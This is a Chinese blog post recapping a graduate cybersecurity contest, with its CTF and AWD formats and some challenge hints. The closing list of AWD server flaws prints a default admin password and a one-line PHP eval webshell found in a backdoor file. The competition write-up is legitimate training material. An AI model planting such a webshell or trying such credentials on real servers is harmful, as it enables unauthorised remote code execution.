第二屆京津冀研究生網路與資訊保安技術大賽記錄
11月3-4日,在北京工業大學經歷了兩天的安全比賽。因為之前參加過第一屆的比賽,所以對這次比賽的形式還是比較熟悉。首先是兩個小時的CTF比賽。第二天下午是三個小時AWD網路攻防模式的比賽。
最後獲得二等獎的名詞,總體來說,還算滿意。作為一個新手,簡單的介紹一下比賽內容,希望給以後參加比賽的人一些幫助。
CTF比賽形式:五大類題目 pwn,密碼學,雜項,web,逆向 。
每一類五道題目,按難度分別為 200,300,400,500,這次比賽的主辦方是安恆,所以如果經常在安恆的平臺打比賽,做題的人,可能會發現一些題目似曾相識。200分值的題目比較簡單,分值比較高的題,有的並不難,但是腦洞比較大。這次的比賽,我認為腦洞題還是比較多。每類題都設定了1,2,3血。
第二天是AWD模式,每一個小組都有兩個需要加固的伺服器,第一個伺服器上有web服務,是motinfo,第二個伺服器上沒有web服務。
一共36個隊伍,可以互相訪問對方的伺服器。比賽期間伺服器不能宕機,重置伺服器前三次免費,之後會扣分,如果伺服器宕機被監測出來後不能修復的話,會扣50分。當我們進入當對方伺服器後,向flag伺服器傳送一條命令,即可獲得獲得flag。每十五分鐘一輪flag,共12輪。
浪裡淘沙:統計詞頻,題目給了幾個數字,就是排序第幾的單詞,組合即可。
派大星 :winhex 找到有用資訊,去掉無用的,生成圖片
逆向 : 檢視字串 發現輸入順序就是flag ,輸入幾次發現是迷宮 即使不逆向 試也可以試出
AWD的部分漏洞:
web伺服器,後臺登入密碼 admin admin123
www檔案目錄下 有後門檔案 door.php <?php @eval($_POST['a']);?>
審計PHP檔案,有函式漏洞,可以執行shell命令